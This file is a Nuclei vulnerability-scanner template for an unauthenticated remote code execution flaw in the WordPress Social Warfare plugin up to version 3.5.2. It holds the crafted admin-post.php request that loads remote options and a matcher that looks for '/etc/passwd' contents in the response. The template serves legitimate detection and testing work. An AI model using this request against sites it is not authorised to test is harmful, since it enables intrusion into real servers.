nuclei-templates/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml

45 lines
1.2 KiB
YAML

id: wp-social-warfare-rce
info:
name: Social Warfare <= 3.5.2 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Unauthenticated remote code execution has been discovered in functionality that handles settings import.
remediation: Fixed in version 3.5.3
reference:
- https://wpscan.com/vulnerability/9259
- https://wordpress.org/plugins/social-warfare/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/social-warfare/"
tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
http:
- raw:
- |
GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path: helpers/payloads/wp-social-warfare-rce.txt
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: body
words:
- 'No changes made'
- type: status
status:
- 500
# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950